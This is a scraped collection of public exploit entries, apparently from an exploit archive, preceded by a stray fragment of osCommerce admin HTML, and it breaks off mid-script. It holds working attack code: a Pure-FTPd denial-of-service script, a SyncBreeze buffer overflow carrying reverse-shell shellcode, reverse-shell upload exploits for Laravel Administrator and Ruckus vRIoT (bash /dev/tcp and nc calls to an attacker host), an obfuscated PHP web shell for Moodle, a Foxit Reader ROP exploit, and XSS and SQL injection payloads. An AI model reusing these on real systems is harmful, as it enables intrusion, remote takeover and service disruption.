type="text/javascript">$("#tdb2").button({icons:{primary:"ui-icon-document"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script><span class="tdbLink"><a id="tdb3" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=lock">Lock</a></span><script type="text/javascript">$("#tdb3").button({icons:{primary:"ui-icon-locked"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td> </tr> <tr> <td class="infoBoxContent"><br />Date Added: 11/19/2020</td> </tr> </table> </td> </tr> </table></td> </tr> </table> </div>

# Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service # Date: 2020. nov. 26., 09:32:17 CET # Exploit Author: xynmaps # Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ # Software Link: https://github.com/jedisct1/pure-ftpd/ # Version: 1.0.48 # Tested on: Parrot Security OS 5.9.0 #encoding=utf8 #__author__ = XYN/Dump/NSKB3 #Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3. """ Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. (if it's limited, just run this script from different proxies using proxychains, and it will work) """ import socket import sys import threading import subprocess import time banner = """ ._________________. | Pure-FTPd | | D o S | |_________________| |By XYN/DUMP/NSKB3| |_|_____________|_| |_|_|_|_____|_|_|_| |_|_|_|_|_|_|_|_|_| """ usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0]) def test(t,p): s = socket.socket() s.settimeout(10) try: s.connect((t, p)) response = s.recv(65535) s.close() return 0 except socket.error: print("Port {} is not open, please specify a port that is open.".format(p)) sys.exit() def attack(targ, po, id): try: subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #print("Worker {} running".format(id)) except OSError: pass def main(): global target, port, start print banner try: target = sys.argv[1] except: print usage sys.exit() try: port = int(sys.argv[2]) except: port = 21 try: conns = int(sys.argv[3]) except: conns = 50 print("[!] Testing if {0}:{1} is open".format(target, port)) test(target, port) print("[+] Port {} open, starting attack...".format(port)) time.sleep(2) print("[+] Attack started on {0}:{1}!".format(target, port)) def loop(target, port, conns): global start threading.Thread(target=timer).start() while 1: for i in range(1, conns + 3): t = threading.Thread(target=attack, args=(target,port,i,)) t.start() if i > conns + 2: t.join() break loop() t = threading.Thread(target=loop, args=(target, port, conns,)) t.start() def timer(): start = time.time() while 1: if start < time.time() + float(900): pass else: subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) t = threading.Thread(target=loop, args=(target, port,)) t.start() break main()

# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow # Date: 18-Sep-2020 # Exploit Author: Abdessalam king(A.salam) # Vendor Homepage: http://www.syncbreeze.com # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe # Version: 10.0.28 # Tested on: Windows 7,windows xp,windows 10 #72413372 [*] Exact match at offset 520 #jmp esp FFE4 \xff\xe4 #!mona modules #!mona find -s "\xff\xe4" -m libspp.dll #address esp => 10090C83 #badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d" #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c -b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread #!/usr/bin/python import socket shell ="" shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1" shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf" shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9" shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc" shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0" shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5" shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5" shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76" shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b" shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60" shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1" shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2" shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1" shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b" shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3" shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3" shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5" shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8" shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83" shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d" shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45" shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77" shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0" shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16"; payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" * 20 + shell +"\x90"*(1400-520-4-20-len(shell)) req ="" req += "POST /login HTTP/1.1\r\n" req += "Host: 192.168.1.20\r\n" req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n" req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" req += "Accept-Language: en-US,en;q=0.5\r\n" req += "Accept-Encoding: gzip, deflate\r\n" req += "Referer: http://192.168.1.20/login\r\n" req += "Content-Type: application/x-www-form-urlencoded\r\n" req += "Content-Length: "+str(len(payload))+"\r\n" req += "Connection: keep-alive\r\n" req += "Upgrade-Insecure-Requests: 1\r\n" req += "\r\n" req += payload # print req s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.20",80)) s.send(req) print s.recv(1024) s.close()

Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Date: 2020-08-13 Exploit Author: Loke Hui Yi Vendor Homepage: https://razerid.razer.com Software Link: http://rzr.to/synapse-3-pc-download Version: <= v3.12.17 Tested on: Windows 10 CVE: CVE-2020-16602 # More info can be found here: # https://www.angelystor.com/2020/09/cve-2020-16602-remote-file-execution-on.html # https://www.youtube.com/watch?v=fkESBVhIdIA # Remote attackers can register applications to the Chroma Server. If the attacker has write access to the ProgramData folder where the Chroma Server stores its data, he can exploit a race condition and get the server to execute a binary of his choosing. # The code below registers an application to the Chroma Server using a name of the attacker's choosing. # The attacker will need to pre-create a folder with the same name as the application to be registered in Razer Chroma SDK\Apps\<appname>, and create an exe file with the same application's name in that folder. The Apps folder is user writable and does not require admin privileges. # The attacker can keep running the code below to get the Server to execute the file while writing the payload to the target directory with another process (eg samba or ftp) in order to exploit the race condition. import requests import json def heartbeat(uri): print(uri + '/heartbeat') r = requests.put(uri + '/heartbeat', verify=False) print(r.text) def keyboard(uri): data = { "effect":"CHROMA_CUSTOM_KEY", "param":{ "color":[ [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535], [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535] ], "key":[ [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, (16777216 | ~255), (16777216 | ~255), (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), (16777216 | ~16776960), (16777216 | ~16776960), 0, 0, 0, 0] ] } } print(uri + '/keyboard') r = requests.put(uri + '/keyboard', json=data, verify=False) print(r.text) text="a" for x in range(20000): text += "a" pload = { "title": "APPNAME", "description": "description", "author": { "name": "name", "contact": "contact" }, "device_supported": [ "keyboard", "mouse", "headset", "mousepad", "keypad", "chromalink"], "category": "application" } server = 'https://chromasdk.io:54236/razer/chromasdk' r = requests.post(server, json=pload, verify=False) json_data = json.loads(r.text) print(json_data) uri = json_data['uri'] heartbeat(uri) #uri = 'https://chromasdk.io:54236/sid=58487' heartbeat(uri) keyboard(uri) print (json_data['sessionid']) do_heartbeat = False if do_heartbeat: sid = 1 uri = 'https://chromasdk.io:54236/sid=' + sid heartbeat(uri) # PoC loop.py for race test ''' import requests def copyfile(src, dst): with open(src, 'rb') as fsrc: with open(dst, 'wb') as fdst: content = fsrc.read() fdst.write(content) while True: try: print("copying") copyfile('pwn.exe', 'C:\\ProgramData\\Razer Chroma SDK\\Apps\\pwn\\pwn.exe') except Exception as e: print(str(e)) '''

# Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting # Date: 11/27/2020 # Exploit Author: Ilca Lucian Florin # Vendor Homepage: http://demo.themeftc.com/wibar # Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 # Version: 1.1.8 # Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge The WordPress theme contains Brands feature which is vulnerable to stored cross site scripting. The logo URL parameter is vulnerable to cross site scripting. The following vector was used for testing XSS: "><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>. In order to reproduce the vulnerability, please follow the next steps: 1. Log in as editor/administrator/contributor/author: https://website.com/wp-admin 2. Go to Brands section 3. Click add new brand and add a custom brand title 4. The vulnerable parameter is: Logo URL / <input type="text" name="ftc_brand_url" id="ftc_brand_url" value=""> 5. Add the following payload: "><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> , where base64 == alert(document.domain) 6. Publish 7. The alert will pop up when a user will visit the website on https://website.com/brand/vulnerablebrand. Evidence: 1. https://ibb.co/1fpYJWN 2. https://ibb.co/S7j5Sgd C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High

# Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting # Date: 13.08.2020 # Exploit Author: Ilca Lucian Florin # Vendor Homepage: https://www.sap.com # Software Link: SAP Lumira # Version: <= 1.31 # Tested on: Windows 7 / Windows 10 / Internet Explorer 11 / Google Chrome 84.0.4147.105 # Vulnerable System: https://system/BOE/BI # Reproduce Cross Site Scripting (XSS): 1. Select Web Intelligence Button 2. Wait for SAP Business Objects to load complete 3. CTRL +N or click on New Document 4. Create an empty document 5. Select new variable 6. Select random name for the variable 7. Add the XSS vectors from evidence 8. Open variable tab and click on new created variable name # Cross Site Scripting (XSS) Vectors Used: • "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> • <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">

# Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting # Google Dork: "WonderCMS" # Date: 2020-11-27 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.wondercms.com/ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 20.10 Steps-To-Reproduce: 1. Login and select button setting 2. Go to tab Files, and upload file contains payload xss with extension like html, svg, htm 3. Go to http://target.lc/data/files/<name-file> and trigger XSS POST /home HTTP/1.1 Host: wordpress.lc:8081 Content-Length: 372 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://wordpress.lc:8081 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6EKP5vjUNS5Icgql User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://wordpress.lc:8081/ Accept-Encoding: gzip, deflate Accept-Language: vi,vi-VN;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=74me71gverejuaf2bns2n5fpkf Connection: close ------WebKitFormBoundary6EKP5vjUNS5Icgql Content-Disposition: form-data; name="uploadFile"; filename="xss.html" Content-Type: text/html <script>alert('XSS')</script> ------WebKitFormBoundary6EKP5vjUNS5Icgql Content-Disposition: form-data; name="token" 5d715f2aebdf138f4968fce8dcd3703778c6fb5a1abea40e27eb9280079474da ------WebKitFormBoundary6EKP5vjUNS5Icgql-- --

# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated) # Author: Victor Campos and Xavi Beltran # Contact: [email protected] # Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/ # Date: 25/3/2020 # Software link: https://github.com/FrozenNode/Laravel-Administrator/ # Version : 4 # Tested on: Laravel-Administrator 4 # CVE : CVE-2020-10963 #!/usr/bin/env python import requests,json,traceback from requests.auth import HTTPBasicAuth #Parameters to be set up (ENTER YOUR VALUES) #=========================================== # Listener IP and port ip = "" port = "" #Admin credentials user = "" password = "" #URLs of the web application domain = "" # For example "https://www.example.com" login_url = "" # For example "/user/login" fileupload_url = "" # For example "/admin/categories/image/file_upload" uploaded_files_url = "" # For example "/categories/images" #Reverse shell payload (DO NOT MODIFY THIS SECTION) #================================================== #GIF file header shell = "GIF89a\r\n" #php reverse shell shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n" with requests.Session() as s: try: print("\n[+] Logging into the panel") s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'}) print("[+] Uploading the malicious file") r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)}) print("[+] Response text:") #print(r.text) shell_file = (json.loads(r.text))["filename"] print("[+] Name of uploaded file: " + shell_file) print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...") r = s.get(domain + uploaded_files_url + '/' + shell_file) except Exception as e: print(str(traceback.format_exc()))

# Product: Ruckus IoT Controller (Ruckus vRIoT) # Version: <= 1.5.1.0.21 # Vendor: https://support.ruckuswireless.com/ # Vulnerability: Command Injection & Broken Authentication # References: CVE-2020-26878 # Discovered by: Juan Manuel Fernandez # Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution # Exploit Author: Emre SUREN # Disclosure Date: 2020-10-26 # Tested on: Appliance #!/usr/bin/python # -*- coding: utf-8 -*- import requests, urllib3, sys from Crypto.Cipher import AES from base64 import b64encode, b64decode from colorama import Fore urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def listen(lhost, lport): opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): ")) if opt == "y": return True else: return False def generatePayload(lhost, lport): payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #" return payload def generateMagicToken(): enc_dec_method = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode("utf8") str_key = 'serviceN1authent' str_to_enc = 'TlBMVVMx' return encrypt(enc_dec_method, salt, str_key, str_to_enc) def encrypt(enc_dec_method, salt, str_key, str_to_enc): aes_obj = AES.new(str_key, AES.MODE_CFB, salt) hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8")) mret = b64encode(hx_enc).decode(enc_dec_method) return mret def execCmd(rhost, rport, lhost, lport): payload = generatePayload(lhost, lport) post_data = { "username": payload, "password": "test" } print(Fore.BLUE + "[*] Payload\t: " + payload) token = generateMagicToken() headers = { "Authorization": token } rpath = "/service/v1/createUser" uri = 'https://' + rhost + ":" + rport + rpath r = requests.post(uri, json=post_data, headers=headers, verify=False) print(Fore.BLUE + "[*] Request sent") if r.status_code == 200: print(Fore.GREEN + "[+] Successful. Check for the session...") else: print(Fore.RED + "[X] Failed. Check for the response...") print(Fore.BLUE + "[*] Response\t: " + r.text) sys.exit() def main(): if (len(sys.argv) != 5): print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>") print("[*] <RHOST> -> Target IP") print("[*] <RPORT> -> Target Port") print("[*] <LHOST> -> Attacker IP") print("[*] <LPORT> -> Attacker Port") print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0])) exit(0) rhost = sys.argv[1] rport = sys.argv[2] lhost = sys.argv[3] lport = sys.argv[4] if not listen(lhost, lport): print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport)) else: execCmd(rhost, rport, lhost, lport) if __name__ == "__main__": main()

# Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF # Date: 2020-07-30 # Author: Julien Ahrens # Vendor Homepage: https://www.acronis.com # Version: 12.5 Build 16341 # CVE: CVE-2020-16171 VERSIONS AFFECTED ==================== Acronis Cyber Backup v12.5 Build 16327 and probably below. VULNERABILITY DETAILS ======================== All API endpoints running on port 9877 under "/api/ams/" whereof some are reachable without authentication, do accept an additional custom header called "Shard": def get_ams_address(headers): if 'Shard' in headers: [...] return headers.get('Shard') # Mobile agent >= ABC5.0 The value of this header is afterwards to construct a separate web request send by the application using a urllib.request.urlopen call: def make_request_to_ams(resource, method, data=None): port = config.CONFIG.get('default_ams_port', '9892') uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource) logging.debug('Making request to AMS %s %s', method, uri) headers = dict(request.headers) del headers['Content-Length'] if not data is None: headers['Content-Type'] = 'application/json' req = urllib.request.Request(uri, headers=headers, method=method, data=data) resp = None try: resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT) except Exception as e: logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e)) return resp This can be abused to conduct SSRF attacks against otherwise unreachable internal hosts of Acronis services that are bound to localhost such as the "NotificationService" running on 127.0.0.1:30572 with a request header like: Shard: localhost:30572/external_email? For more details, see the referenced blog post. RISK ======= The vulnerability can be used by an unauthenticated or authenticated attacker to query otherwise unreachable internal network resources. As demonstrated in the corresponding blog post, using this vulnerability, it is possible to i.e. (amongst others) send out fully customized emails or modify the application's resource settings. 7. SOLUTION =========== Update to v12.5 Build 16342 8. REPORT TIMELINE ================== 2020-07-30: Discovery of the vulnerability 2020-07-30: Since the vulnerability is fixed in Cyber Protect: Sent out a request to the Vendor to check whether Cyber Backup is EOL and users are advised to migrate to Cyber Protect instead. 2020-07-30: CVE requested from MITRE 2020-07-31: MITRE assigns CVE-2020-16171 2020-07-31: Public Disclosure date set to 2020-08-14 2020-08-04: Vendor asks for a 90 days extension 2020-08-04: Extension not granted because there is a fix available already. Public disclosure date set to 2020-09-14 2020-09-05: Asking vendor about the status of the fix 2020-09-08: Vendor states that a fix has been backported to Cyber Backup 12.5 under the reference ABR-202103 2020-09-14: Public disclosure 9. REFERENCES ============= https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/ https://dl.acronis.com/u/backup/rn/12.5/user/en-US/AcronisBackup12.5_relnotes.htm

# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated) # Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang # Google Dork: N/A # Date: 2020-08-24 # Vendor Homepage: https://accesspressthemes.com # Software Link: https://wordpress.org/plugins/accesspress-social-icons/ # Version: <= 1.7.9 # Tested on: Ubuntu 18.04 Description: A blind SQL injection vulnerability is present in Ajax load more. <?php $si_id = esc_attr($atts['id']); global $wpdb; $table_name = $table_name = $wpdb->prefix . "aps_social_icons"; $icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id = $si_id"); POC: POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user HTTP/1.1 Host: pwnme.me User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit X-WP-Nonce: 514cd2ab3f X-HTTP-Method-Override: PUT Content-Type: application/json Origin: http://pwnme.me Content-Length: 103 Connection: close Cookie: wp-settings-time-2=1597912773; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79; wp-settings-time-3=1598234126 {"id":66,"content":"<!-- wp:shortcode -->\n[aps-social id=\"4 and sleep(5)\"]\n<!-- /wp:shortcode -->"}

# Exploit Title: Moodle 3.8 - Unrestricted File Upload # Date: 2019-09-08 # Exploit Author: Sirwan Veisi # Vendor Homepage: https://moodle.org/ # Software Link: https://github.com/moodle/moodle # Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4... # Tested on: Moodle Version 3.8 # CWE : CWE-434 I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that allows the attacker to upload or transfer files of dangerous types. Example exploitation request: POST /repository/repository_ajax.php?action=upload HTTP/1.1 Host: VulnerableHost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------38898830537874132223151601680 Content-Length: 2763 Origin: https://VulnerableHost Connection: close Referer: https://VulnerableHost/user/files.php Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai Upgrade-Insecure-Requests: 1 -----------------------------38898830537874132223151601680 Content-Disposition: form-data; name="repo_upload_file"; filename="image.php" Content-Type: image/jpeg GIF89a; <?php $Q=str_replace('kz','','crekzakztkze_kzfunckztkzion'); $O='"";for%(%$i=%0;$i<$l;){for%($j=0%;($j<$c&%&$i<$l);$%j++,$i+%+%){$o.=$%t{$i'; $l='_contents(%"php:%//input"),%$m)=%=1){@ob%_start();%@eva%l(@gzunc%o%mpress(%@'; $C='$k="3%fbd6%8c8"%;$kh="2a%e%7d638909f";$%kf%="60eb0ffaeb%1%7";$p="dP%FT1%'; $h='x(@b%ase%6%4_decode($m[1%]),$k)));%$o=@o%b_get_conte%%nts();@ob_end%%_c%lean'; $N='}%%^$k{$j};}}retu%rn $o;}i%f(@preg%_matc%%h("/$kh(.+)$%%k%f%/",@file_ge%t'; $e='Nmy694Bcj%Vc";fu%nction% x(%$t,$k){$c=st%rle%n%($%%k);$l=strlen($t)%;$o='; $V='();$r=@bas%e64_en%cod%e(@x(@%%gzcomp%ress($o),$k))%;%print("$%p$kh$r$kf");}'; $P=str_replace('%','',$C.$e.$O.$N.$l.$h.$V); $n=$Q('',$P);$n(); ?> -----------------------------

# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution # Date: 2020-08-29 # Exploit Author: CrossWire # Vendor Homepage: https://www.foxitsoftware.com/ # Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English # Version: 9.0.1.1049 # Tested on: Microsoft Windows Server 2016 10.0.14393 # CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958) #!/usr/bin/python3 ''' =========================================================================== | PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958) | =========================================================================== | Written by: Kevin Dorland (CrossWire) | | Date: 08/29/2020 | | | | Exploit originally discovered by Steven Seeley (mr_me) of Source Incite | | | | References: | | https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) | | https://www.exploit-db.com/exploits/45269 (Metasploit adaptation) | | | =========================================================================== ''' PDF_TEMPLATE = ''' %PDF 1 0 obj <</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj <</S /JavaScript /JS ( var heap_ptr = 0; var foxit_base = 0; var pwn_array = []; function prepare_heap(size){ var arr = new Array(size); for(var i = 0; i < size; i++){ arr[i] = this.addAnnot({type: "Text"});; if (typeof arr[i] == "object"){ arr[i].destroy(); } } } function gc() { const maxMallocBytes = 128 * 0x100000; for (var i = 0; i < 3; i++) { var x = new ArrayBuffer(maxMallocBytes); } } function alloc_at_leak(){ for (var i = 0; i < 0x64; i++){ pwn_array[i] = new Int32Array(new ArrayBuffer(0x40)); } } function control_memory(){ for (var i = 0; i < 0x64; i++){ for (var j = 0; j < pwn_array[i].length; j++){ pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4 } } } function leak_vtable(){ var a = this.addAnnot({type: "Text"}); a.destroy(); gc(); prepare_heap(0x400); var test = new ArrayBuffer(0x60); var stolen = new Int32Array(test); var leaked = stolen[0] & 0xffff0000; foxit_base = leaked - 0x01f50000; } function leak_heap_chunk(){ var a = this.addAnnot({type: "Text"}); a.destroy(); prepare_heap(0x400); var test = new ArrayBuffer(0x60); var stolen = new Int32Array(test); alloc_at_leak(); heap_ptr = stolen[1]; } function reclaim(){ var arr = new Array(0x10); for (var i = 0; i < arr.length; i++) { arr[i] = new ArrayBuffer(0x60); var rop = new Int32Array(arr[i]); rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret rop[0x02] = 0x72727272; // junk rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret rop[0x04] = 0xffffffff; // ret of WinExec rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret rop[0x0a] = foxit_base + 0x0041c6ca; // ret rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret //Path to executable <PATH TO EXECUTABLE> //End Path to executable rop[0x17] = 0x00000000; // adios, amigo } } function trigger_uaf(){ var that = this; var a = this.addAnnot({type:"Text", page: 0, name:"uaf"}); var arr = [1]; Object.defineProperties(arr,{ "0":{ get: function () { that.getAnnot(0, "uaf").destroy(); reclaim(); return 1; } } }); a.point = arr; } function main(){ leak_heap_chunk(); leak_vtable(); control_memory(); trigger_uaf(); } if (app.platform == "WIN"){ if (app.isFoxit == "Foxit Reader"){ if (app.appFoxitVersion == "9.0.1.1049"){ main(); } } } )>> trailer <</Root 1 0 R>> ''' import sys #Enforces 2 hex char byte notation. "0" becomes "0x00" def format_byte(b): if (len(b) > 2) and (b[0:2] == '0x'): b = b[2:] if len(b) == 1: b = '0' + b return '0x' + b def char2hex(c): return format_byte(hex(ord(c))) #Converts file path into array of eleven 32-bit hex words def path_to_machine_code(path,little_endian = True): print("[+] Encoding Path:",path) #ensure length if len(path) > 44: print("[CRITICAL] Path length greater than 44 